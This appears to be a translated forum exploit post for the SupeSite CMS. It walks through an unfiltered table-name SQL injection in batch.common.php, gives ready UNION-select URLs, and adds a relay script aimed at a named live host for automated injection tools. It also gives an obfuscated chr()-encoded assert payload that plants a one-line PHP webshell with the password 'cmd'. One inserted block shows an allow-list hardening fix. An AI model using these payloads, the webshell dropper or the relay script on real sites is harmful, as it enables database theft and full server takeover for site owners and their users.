SupeSite universal SQL injection and backend getshell

Tested on 6.x and 7.x; other versions were not tested, so test them yourselves.
[php]
batch.common.php (218) :
} elseif ($action == 'modelquote') {

    // model comment quoting
    $name = empty($_GET['name'])?'':trim($_GET['name']); // no filtering
    $cid = empty($_GET['cid'])?0:intval($_GET['cid']);
    $html = false;
    if(!empty($name) && !empty($cid)) {
        $item = array();
        // $name goes through tname() and is then concatenated straight into the table name
        $query = $_SGLOBAL['db']->query('SELECT * FROM '.tname($name.'comments').' WHERE cid=\''.$cid.'\'');
        if($item = $_SGLOBAL['db']->fetch_array($query)) {
            $item['message'] = preg_replace("//is", '',$item['message']);
            $html = '[quote]'.$blang['from_the_original_note'].$item['author'].$blang['at'].sgmdate($item['dateline']).$blang['released']."\n".cuthtml($item['message'], 100).'[/quote]';
            showxml($html);
        }
    }
    showxml($html);

}
[/php]
Now let's look at the tname function:
[php]
function/common.func.php (601) :
function tname($name, $mode=0) {
    global $_SC;
    if($mode == 1) {
        return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`';
    } elseif ($mode == 2) {
        return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`';
    } else {
        return $_SC['tablepre'].$name;
    }
}
[/php]

Still no filtering: it doesn't touch the value at all, so what's stopping you from injecting?
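For contrast, an added example (not SupeSite's own code) of how the modelquote branch could be hardened: the model name is checked against a fixed allow-list before it ever reaches tname(), and cid is cast to an integer. The allow-list entries, validate_model_name() and build_modelquote_query() are assumptions for illustration; only the "space" model (table spacecomments) is known from this write-up.

```php
<?php
// Added example, not SupeSite's own code. The allow-list, validate_model_name()
// and build_modelquote_query() are assumptions for illustration; only the
// "space" model (table spacecomments) is known from the write-up.

// Model prefixes whose "<model>comments" table may be quoted from (assumed).
const MODELQUOTE_MODELS = ['space', 'blog', 'news'];

// Stand-in for SupeSite's tname(): it only prepends the table prefix, which is
// exactly why the identifier must already be safe before it gets here.
function tname(string $name, int $mode = 0): string
{
    return 'supe_' . $name;
}

/**
 * Returns the validated model name, or null if the input must be rejected.
 * Both checks matter: the regex keeps SQL metacharacters (space, quote, '#',
 * '/') out of the FROM clause, and the allow-list rejects a syntactically
 * clean but unexpected table.
 */
function validate_model_name(string $name, array $allowed = MODELQUOTE_MODELS): ?string
{
    $name = trim($name);
    if (!preg_match('/^[a-z][a-z0-9_]{0,31}$/', $name)) {
        return null;
    }
    return in_array($name, $allowed, true) ? $name : null;
}

/**
 * Builds the lookup query, or returns null when the request should be treated
 * as "nothing to quote" (the same outcome the original gives an empty name).
 */
function build_modelquote_query(string $rawName, $rawCid): ?string
{
    $name = validate_model_name($rawName);
    $cid  = (int) $rawCid;          // same intval() treatment as the original
    if ($name === null || $cid <= 0) {
        return null;
    }
    return 'SELECT * FROM ' . tname($name . 'comments') . ' WHERE cid=' . $cid;
}

// Constructed inputs: a legitimate request, then the injected value shown above.
var_dump(build_modelquote_query('space', '1'));
var_dump(build_modelquote_query('spacecomments where 1=2 union select 1', '1'));
```

The second call returns null, so the query is never built; the original code would have concatenated the whole string into the FROM clause.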
exp:
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments [sql] #
After this you can go straight to order by, you know the drill:
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx #

Since the column count differs between versions, I suggest determining it with order by first. For 7.5, for example, it is 21 columns; here's a 7.5 exp:
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23

You can also just configure this URL in an injection tool and let it run:
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2

On SupeSite 7.5 backend GETSHELL
A new way to get a shell, identical to the one for UCHome.

http://www.xxx.com/admincp.php?action=usrblocks&blocktype=&op=addblockcode
[php]
@assert(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));
?>
[/php]
Call: http://www.xxx.com/batch.javascript.php?bid=1650 , which generates the one-line webshell a.php under data, with password cmd.

Here is a relay script:

[php]
<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);

$url = "http://blog.0day5.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; // change to the address you need to submit to

echo $url;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
[/php]

Then just point a tool at it and run.
